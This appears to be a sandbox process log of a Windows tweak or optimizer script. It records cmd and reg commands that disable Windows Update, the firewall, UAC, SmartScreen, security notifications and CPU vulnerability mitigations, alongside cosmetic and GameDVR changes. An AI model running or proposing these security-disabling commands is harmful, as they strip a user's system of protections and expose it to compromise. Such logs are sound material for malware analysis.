C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f3⤵
- Modifies firewall policy service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f3⤵
- Modifies firewall policy service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f2⤵
-
C:\Windows\system32\reg.exeReg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f2⤵
-
C:\Windows\system32\reg.exeReg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c bcdedit /set disabledynamictick yes2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c bcdedit /set useplatformtick yes2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set useplatformtick yes3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f3⤵
-
